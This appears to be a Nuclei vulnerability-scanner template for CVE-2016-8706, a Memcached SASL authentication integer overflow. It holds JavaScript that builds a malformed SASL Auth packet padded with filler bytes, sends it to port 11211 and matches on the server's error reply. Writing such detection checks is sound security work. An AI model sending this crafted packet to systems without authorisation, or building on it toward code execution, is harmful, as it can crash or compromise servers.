Vulnerability Description
An integer overflow in the process_bin_sasl_auth function of Memcached, which handles authentication commands of the Memcached binary protocol, can be abused to cause a heap overflow and lead to remote code execution.
id: CVE-2016-8706

info:
  name: Memcached Server SASL Authentication - Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.
  reference:
    - https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py
    - https://nvd.nist.gov/vuln/detail/CVE-2016-8706
    - http://rhn.redhat.com/errata/RHSA-2016-2819.html
    - http://www.debian.org/security/2016/dsa-3704
    - http://www.securitytracker.com/id/1037333
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2016-8706
    cwe-id: CWE-190
    epss-score: 0.68629
    epss-percentile: 0.98539
    cpe: cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: memcached
    product: memcached
    verified: true
  tags: cve,cve2016,rce,js,memcached,vuln
javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      let packet = bytes.NewBuffer();
      // 0x80 = binary-protocol request magic, 0x21 = SASL Auth opcode
      packet.Write(new Uint8Array([0x80, 0x21]))
      let cmd = 'stats'
      packet.WriteString(cmd)
      packet.Pack("!H", [32]);
      packet.Pack("!I", [1]);
      // 1000 bytes of filler appended to the request
      let buzz = Array(1000).fill("A").join('');
      packet.WriteString(buzz)
      // Send the request over TCP and read the server's reply
      const c = require("nuclei/net");
      let conn = c.Open('tcp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());
      conn.RecvString();
    args:
      Host: "{{Host}}"
      Port: 11211
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Invalid arguments"
      - type: word
        words:
          - "Auth failure"
        negative: true
# digest: 490a00463044022079f9220661851cd4375ccab3350fa2f22eda069b24a37901dc4d0b1ac2cdd85e02202fe31ea9fd53e88e9871e9074d49f94f97824502c1b4e5352d4c45f4e6068e0b:922c64590222798bb761d5b6d8e72950